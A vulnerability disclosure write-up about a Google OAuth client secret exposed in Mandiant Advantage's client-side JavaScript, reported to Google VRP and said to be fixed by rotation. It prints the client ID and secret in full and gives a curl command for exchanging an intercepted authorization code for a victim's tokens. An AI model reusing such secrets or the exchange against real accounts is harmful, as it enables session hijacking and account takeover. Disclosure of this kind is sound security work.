I discovered a vulnerability in the Mandiant Advantage platform that exposes the Google OAuth 2.0 Client Secret. This leak allows an attacker to bypass the security requirements of the OAuth flow, enabling full application impersonation and unauthorized session hijacking.
What Was the Vulnerability?
Mandiant Advantage is configured as a “Confidential Client,” meaning it relies on a private secret to authenticate itself to Google’s Identity Provider. However, this secret (GOCSPX) was hardcoded directly into the client-side JavaScript source code.
Because this secret was public, any attacker could finalize the OAuth handshake that is normally reserved for the secure backend server. This breaks the fundamental trust model between Mandiant and Google as defined in RFC 6749.
Why Is This Dangerous?
- Application Impersonation: Attackers can use the secret to craft legitimate Google OAuth consent screens for “Mandiant Advantage,” making phishing attacks look authentic to the user.
- Unauthorized Token Exchange: If an attacker intercepts a temporary authorization code, they can use the leaked secret to exchange it for the victim’s Access Token and Refresh Token.
- Persistent Access: This allows an attacker to maintain a session and interact with Mandiant’s internal APIs (
advantage-api.mandiant.com) as the victim. - Violation of OAuth Trust Model: It bypasses the server-side exchange requirement intended for confidential clients.
How to Reproduce the Issue
Below is the technical breakdown of how I verified the exploit and performed a manual token exchange.
1. Locate the Secret
View the page source of https://advantage.mandiant.com/ and find the configuration object in the frontend code:
REACT_APP_OAUTH_CLIENT_ID:"63027373284-ko4rclstem78bqj8uuq28k31racgvuc0.apps.googleusercontent.com",
REACT_APP_OAUTH_CLIENT_SECRET:"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",
REACT_APP_OAUTH_REDIRECT_URI:"https://advantage.mandiant.com/accountmanagement/integrations"2. Manual Token Exchange
I confirmed that this secret is functional and required by performing a manual exchange using a captured authorization code via the terminal:
# Exchange Request (using Leaked Secret)
curl -X POST https://oauth2.googleapis.com/token \
-d "code=<AUTHORIZATION_CODE>" \
-d "client_id=63027373284-ko4rclstem78bqj8uuq28k31racgvuc0.apps.googleusercontent.com" \
-d "client_secret=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" \
-d "grant_type=authorization_code" \
-d "redirect_uri=https://advantage.mandiant.com/accountmanagement/integrations"Rigorous False Positive Verification
I confirmed that the Google Token Endpoint mandates this secret for the Mandiant Client ID via a negative test:
- Request WITHOUT secret: Returns
400 Bad Request (client_secret is missing). - Request WITH secret: Returns
200 OK.
This proves the application is configured as a “Confidential Client” and the leak directly enables unauthorized token acquisition.
Resolution and Fix
I reported this to the Google VRP, and it was marked as VERIFIED. Google has since patched the vulnerability by rotating the compromised secret and moving the OAuth exchange logic to the server-side to prevent client-side exposure
